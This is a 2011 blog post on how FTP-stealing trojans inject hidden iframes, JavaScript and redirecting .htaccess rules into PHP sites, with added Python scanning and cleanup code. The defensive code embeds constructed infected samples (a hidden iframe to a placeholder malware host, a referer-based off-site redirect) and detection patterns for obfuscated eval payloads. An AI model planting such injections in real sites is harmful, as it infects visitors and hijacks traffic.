Friday, February 25, 2011

How is malware or a virus inserted into a PHP website?


There are several ways a virus can be inserted into a PHP website; the possibilities are listed below:

Possibility 1

Malicious code is being injected into PHP, JavaScript and HTML scripts. Website users download the malicious code and go on to infect others.
When you open a website (most probably in IE) that is infected with malicious code, your browser downloads the malicious code (a trojan/spyware) from the URL specified in an iframe tag or in the source of a script tag (sometimes your browser also opens Acrobat Reader). Most anti-virus products don't detect this trojan; some only give a warning but don't block it. So once your computer is infected, a trojan residing on it steals your FTP passwords when you type them into your FTP program. Using these FTP accounts, the trojan scans all the directories on your FTP server and finds files having any of the following words in their name:
  • main
  • default
  • index
  • home
  • and any file included at the top of the index file
The trojan then injects malicious code into these files and so infects the users visiting your website.
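A defender can turn the file list above into a scanner. The following is an added example written for this page, not code from the original post or from any named tool: it picks the candidate file names from the list, follows the include/require statements at the top of each index file (an assumption about how small PHP sites pull in their headers), and reports hidden iframes and scripts that point off-site, content appended after a file's final `?>`, and `eval()` of a decoded payload. The sample infected index.php, the EXAMPLE-MALWARE-HOST placeholder and the indicator patterns are constructed for illustration.

```python
import os
import re
from typing import Dict, List

# File names the post lists as the trojan's targets; any extension counts.
TARGET_STEMS = {"index", "main", "default", "home"}

# include/require of a literal file name (assumption: the common form in small
# PHP sites; variables or constants in the path are not followed).
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""", re.I)

# Illustrative indicators of injected content, not a complete signature set.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
SRC_HOST_RE = re.compile(r"""src\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.I)
EXT_SCRIPT_RE = re.compile(r"<script\b[^>]*>", re.I | re.S)
OBFUSCATED_RE = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|unescape)\s*\(", re.I)


def is_candidate(filename: str) -> bool:
    """True for the file names from the post (index.php, main.html, Default.htm, ...)."""
    stem = os.path.splitext(os.path.basename(filename))[0].lower()
    return stem in TARGET_STEMS


def included_files(source: str) -> List[str]:
    """File names pulled in by include/require statements, in order of appearance."""
    return INCLUDE_RE.findall(source)


def scan_source(source: str, site_host: str) -> List[str]:
    """Return human-readable findings for one file's contents.

    site_host is the site's own host name; iframe/script sources that point
    anywhere else are reported, same-origin ones are not.
    """
    findings = []
    own = site_host.lower()
    # The post notes the IFRAME is usually appended after the final "?>", so
    # anything non-blank after the last closing tag is worth a look.
    if "?>" in source:
        tail = source.rsplit("?>", 1)[1].strip()
        if tail:
            findings.append("content after final ?>: %r" % tail[:60])
    for m in IFRAME_RE.finditer(source):
        tag = m.group(0)
        src = SRC_HOST_RE.search(tag)
        if src and src.group(1).lower() != own:
            hidden = " (hidden)" if HIDDEN_RE.search(tag) else ""
            findings.append("iframe to external host %s%s" % (src.group(1).lower(), hidden))
    for m in EXT_SCRIPT_RE.finditer(source):
        src = SRC_HOST_RE.search(m.group(0))
        if src and src.group(1).lower() != own:
            findings.append("external script from %s" % src.group(1).lower())
    if OBFUSCATED_RE.search(source):
        findings.append("eval() of a decoded payload")
    return findings


def scan_tree(root: str, site_host: str) -> Dict[str, List[str]]:
    """Walk a web root, scanning candidate files plus whatever they include."""
    report: Dict[str, List[str]] = {}
    queue = [os.path.join(d, f) for d, _, files in os.walk(root)
             for f in files if is_candidate(f)]
    seen = set()
    while queue:
        path = queue.pop()
        if path in seen or not os.path.isfile(path):
            continue
        seen.add(path)
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            source = fh.read()
        findings = scan_source(source, site_host)
        if findings:
            report[path] = findings
        # Includes are resolved relative to the including file's directory.
        for inc in included_files(source):
            queue.append(os.path.normpath(os.path.join(os.path.dirname(path), inc)))
    return report


# Constructed sample of an infected index.php; the host name is a placeholder.
SAMPLE_INFECTED = """<?php
require_once('header.php');
echo 'Welcome';
?>
<iframe src="http://EXAMPLE-MALWARE-HOST.invalid/in.cgi" width="0" height="0" style="visibility:hidden"></iframe>
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_INFECTED, "www.example.com"):
        print(finding)
```

Run `scan_tree("/path/to/webroot", "www.yoursite.com")` against a copy of the site taken over FTP. The "content after final ?>" finding is a pointer rather than proof, since legitimate templates also mix HTML after a closing PHP tag; the off-site iframe and script findings are the ones to act on first.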

Possibility 2

This issue is provoked by a Windows virus that sniffs the internet connection for user names and passwords of FTP accounts. It then silently downloads every file (or only the index/default files) from the remote FTP server to the infected Windows PC, adds the iframe or JavaScript code, and finally uploads the files back. So, before removing this virus from the remote servers, check your computers first. The virus is known as Trojan.Script.Iframe.

Possibility 3

An .htaccess file was automatically put into my site.
It got there through some vulnerability or other, most likely your computer being infected with something that captured your FTP login. But it could also be a problem with the security of your host or your scripts.

It basically takes all requests to your site that were referred from any of the listed sites and that do not have the listed words in the user agent, and redirects them to the link at the bottom. Based on the extensive list, I would guess its purpose is to hijack bots from your site.
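The rule set described above has a recognisable shape: one or more RewriteCond lines on the referer and user agent, followed by a RewriteRule that redirects to another domain. The following added example (written for this page, not from the original post) audits an .htaccess file for that pattern. The sample .htaccess, the EXAMPLE-REDIRECT-HOST placeholder and the criterion for "suspicious" (an off-site redirect conditioned on HTTP_REFERER or HTTP_USER_AGENT) are my own assumptions.

```python
import re
from typing import List

# Constructed .htaccess modelled on the post's description: visitors coming
# from the listed sites are redirected elsewhere unless their user agent
# contains one of the listed words. Domains are placeholders, not real IoCs.
SAMPLE_HTACCESS = """
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|ask|aol).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^.*(facebook|twitter|myspace).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(googlebot|msnbot|slurp).*$ [NC]
RewriteRule .* http://EXAMPLE-REDIRECT-HOST.invalid/go.php [R=301,L]
"""

COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
REDIRECT_FLAG_RE = re.compile(r"(?:^|,)R(?:=\d+)?(?:,|$)", re.I)


def audit_htaccess(text: str, site_host: str) -> List[str]:
    """Flag RewriteRules that send visitors off-site based on referer or user agent.

    A legitimate rewrite set rarely needs to look at who sent the visitor
    before bouncing them to another domain, which is the pattern the post
    describes. Returns one message per suspicious rule.
    """
    findings = []
    pending = []  # RewriteCond lines seen since the last RewriteRule
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            pending.append((cond.group(1).upper(), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target, flags = rule.group(2), rule.group(3) or ""
        is_redirect = REDIRECT_FLAG_RE.search(flags) is not None
        external = re.match(r"https?://([^/\s]+)", target, re.I)
        off_site = bool(external) and external.group(1).lower() != site_host.lower()
        vars_used = sorted({v for v, _ in pending})
        negated_ua = any(v == "HTTP_USER_AGENT" and p.startswith("!") for v, p in pending)
        if off_site and is_redirect and vars_used:
            findings.append(
                "line %d: redirect to %s conditioned on %s (%d conditions%s)" % (
                    lineno, external.group(1), ", ".join(vars_used), len(pending),
                    ", user agent excluded" if negated_ua else ""))
        pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings


if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, "www.example.com"):
        print(finding)
```

Plain redirects to your own domain, or rules with no referer/user-agent conditions, are not reported, so the audit can run over every .htaccess under the web root without drowning in a site's normal rewrite rules.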

Possibility 4

Some FTP clients store passwords in plain text. Some viruses search for these files and send them "home". I don't know about WinSCP -- although the protocol (SSH) is a lot safer than FTP, I think it still stores passwords in plain text. That's all I can think of right now; if you give more details, maybe other ideas will pop up. Be safe.

Possibility 5

A virus attack injecting JavaScript, iframe or other malicious code into the index page.

Normally, the virus attacks the following files on your server:
 index.php
 index.html
 main.php
 header.php
 footer.php


At the start or end of these files it inserts iframe, JavaScript, PHP or encoded malicious code.


What does it do?

I can only guess. The code calls a script on the online-channels.info site. It could be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it could be trying to run some malicious code.

What does it do?

It saves your FTP password, accesses your account, and installs in your index files (the index of every directory) an IFRAME that opens a virus page from the index of your forum.


How is it done?

This is a sophisticated operation, and the infection cycle is involved, but basically the hacker(s) set up innocent-looking sites (or use previously hacked sites whose owners are usually unaware of being compromised) and load them with expensive hacking tools like Mpack. When someone visits such a site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may now have a keylogger that sends their passwords etc. to the hacker(s), and moves on. If the innocent visitor has an FTP or root password for any internet site, the hackers use a program that goes to that person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised: the hackers already have the FTP or root passwords to log in. And since they have at least your account's FTP password, whatever permissions your folders and files are set to make no difference.

After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the visitor's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked, so that the number of hacked sites will grow (as they have, starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000, the Russian hacking bulletin boards are offering Mpack with 1 year of support and a GUARANTEE that antivirus programs will not catch the keyloggers. So keep your antivirus program updated, but don't depend on it completely!
This is how the hack spreads quickly from one computer to another, broadcasting the passwords to the hackers. During my research into this, I even found some of the password files collected by the hack on some of the hacked servers, where they pass this password file to their tool to add the code. In some cases Google's bots pick up these files, and you can even find the login details of FTP accounts and server root logins in Google.

How did I get attacked?

1. Your computer, or a computer you use to administer your website, gets infected with a virus or trojan.
2. That virus or trojan runs a process on the computer that searches FTP applications and their databases for username and password combinations, or simply looks for usernames and passwords in files on the computer.
3. When a username and password are found, that information is e-mailed, or otherwise sent, to an individual or a group of individuals.
4. That individual or group then has your account login information. They connect to your account via FTP using the hostname, username and password that the trojan/virus provided.
5. Once connected to your account over FTP, they download your index page, edit it to place a malicious piece of JavaScript or iframe code in it, then re-upload it to your account.
6. Your website is now infected with malicious JavaScript or iframe code, which can then be used to infect or track other visitors to your website.
Your computer being infected with a virus is not a direct result of your website being infected, or vice versa. It is because of the type of virus or trojan installed on your computer that your login information was compromised, and this compromised data is what led to your website being infected.
How you got infected (step 1) is completely up in the air. Perhaps you downloaded a program that was infected. Perhaps you received an e-mail that caused the infection. Perhaps you visited a website that caused the infection. There's really no way to be absolutely certain of how this infection initially took place. The best thing you can do is take preventive measures. Keep your anti-virus software up to date. Make sure the virus scanner's memory-resident component stays running. Do routine virus scans on your computer just to be sure. Use anti-spyware software to keep tabs on possible trojans or keyloggers that might be installed on your computer. Practice overall safe web browsing. I recommend using only Firefox as your web browser and installing the NoScript Firefox add-on to help prevent malicious JavaScript from running in your browser.
All of this assumes that your account credentials were compromised by a local virus or trojan. That may not be the case. I would bet that your credentials have been compromised in some way, but even that is not a given. Another way for your credentials to be compromised is if you leave your username and password written down near your desk at work or at a coffee shop: if you leave them in plain view, someone else may read them, and then your information is compromised. There's really no way to know exactly how the information was compromised.
It's also possible that there was no credential compromise at all. You may have an outdated script installed on your account or web server that allowed malicious users to gain access to your account and inject material into your website. You should always make sure you are running the latest version of any scripts or applications on your website to prevent something like this from happening.

What is the solution now?

If you are facing this problem and your administrator says it's only your account, just change the FTP password and it will stop.
You must remove the code as soon as the attack happens and change the file permissions to READ ONLY (chmod 444) to make sure it never gets attacked again. Please change the FTP password immediately. Just changing the password is not the complete solution, but it is the first step.
What next? Your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install whatever antivirus or anti-spyware software you think could block it. But the best solution is to clean-format the computer.
Just do these three things:
1) Change the FTP or root password of the server.
2) Clean-format the PC.
3) Clean the forum.
You can download file_check.php. Put it in the root of the forum and run it from the address http://yourforumadress.com/file_check.php .
The IFRAME code is usually added after the "?>" of the PHP code. You'll get a list of pages from which you need to delete the IFRAME.
Now go to index.template.php in the Themes/your theme directory. Search for where the code starts, and there you'll find another IFRAME. Delete it (WARNING: leave the '; that follows it in place).
Now the forum is "clean".
In some cases, this "virus" also makes modifications to your database. Make sure you check your database and remove any suspicious code.
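The forum-cleaning steps above (and the injected-file list under Possibility 5) can be scripted so that only the iframe element is removed and the surrounding PHP is left intact, which is exactly what the warning about the trailing `';` is protecting. The following is an added example written for this page; it is not the post's file_check.php. The two sample files, the EXAMPLE-MALWARE-HOST placeholder and the `_quarantine` backup directory are constructed for illustration.

```python
import os
import re
import shutil
import stat
import tempfile
from typing import Dict, Tuple

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.I | re.S)

# Constructed samples of the two injection sites described in the post; the
# host name is a placeholder, not a real indicator.
SAMPLE_FILES = {
    # 1. Appended after the closing "?>" of index.php.
    "index.php": (
        "<?php\nrequire_once('header.php');\necho 'Welcome';\n?>\n"
        "<iframe src=\"http://EXAMPLE-MALWARE-HOST.invalid/in.cgi\" "
        "width=\"0\" height=\"0\"></iframe>\n"),
    # 2. Spliced into a PHP string in the theme template. Deleting the whole
    #    line would also remove the closing '; and break the template, which
    #    is what the post's warning is about.
    "Themes/default/index.template.php": (
        "<?php\nfunction template_main()\n{\n"
        "\techo '<div class=\"footer\">' . "
        "'<iframe src=\"http://EXAMPLE-MALWARE-HOST.invalid/in.cgi\" "
        "width=\"0\" height=\"0\"></iframe>';\n"
        "}\n"),
}


def strip_iframes(source: str) -> Tuple[str, int]:
    """Remove only the iframe elements, leaving the surrounding PHP untouched."""
    return IFRAME_RE.subn("", source)


def clean_file(path: str, root: str, backup_dir: str) -> int:
    """Quarantine a copy, strip injected iframes, write back, set mode 0444.

    Returns the number of iframes removed (0 means the file was left alone).
    """
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    cleaned, count = strip_iframes(source)
    if count == 0:
        return 0
    # Keep the infected original for later analysis before touching it.
    os.makedirs(backup_dir, exist_ok=True)
    backup_name = os.path.relpath(path, root).replace(os.sep, "__") + ".infected"
    shutil.copy2(path, os.path.join(backup_dir, backup_name))
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)  # make writable if already 444
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(cleaned)
    os.chmod(path, 0o444)  # READ ONLY / chmod 444, as the post recommends
    return count


def clean_site(root: str, backup_dir: str) -> Dict[str, int]:
    """Clean every .php/.html file under root; returns {relative path: iframes removed}."""
    report: Dict[str, int] = {}
    backup_abs = os.path.abspath(backup_dir)
    for dirpath, _dirs, files in os.walk(root):
        if os.path.abspath(dirpath).startswith(backup_abs):
            continue  # never rescan the quarantine
        for name in files:
            if name.lower().endswith((".php", ".html", ".htm")):
                path = os.path.join(dirpath, name)
                removed = clean_file(path, root, backup_dir)
                if removed:
                    report[os.path.relpath(path, root).replace(os.sep, "/")] = removed
    return report


def demo() -> dict:
    """Write the constructed sample site to a temp dir, clean it, report the outcome."""
    root = tempfile.mkdtemp(prefix="forum_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    report = clean_site(root, os.path.join(root, "_quarantine"))
    template = os.path.join(root, "Themes", "default", "index.template.php")
    with open(template, "r", encoding="utf-8") as fh:
        template_after = fh.read()
    mode = stat.S_IMODE(os.stat(template).st_mode)
    quarantined = sorted(os.listdir(os.path.join(root, "_quarantine")))
    shutil.rmtree(root)
    return {"report": report, "template_after": template_after,
            "mode": mode, "quarantined": quarantined}


if __name__ == "__main__":
    print(demo())
```

After cleaning, the template's `echo` statement still ends in `. '';`, so the PHP parses; the infected originals sit in the quarantine directory for comparison. Setting the files to 0444 follows the post's advice, but as the post itself notes under "How is it done?", an attacker who still holds your FTP password can change permissions back, so the password change and the clean PC remain the real fix. The pattern only matches iframe elements that have a closing tag, so review anything file_check.php reports that this leaves behind.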
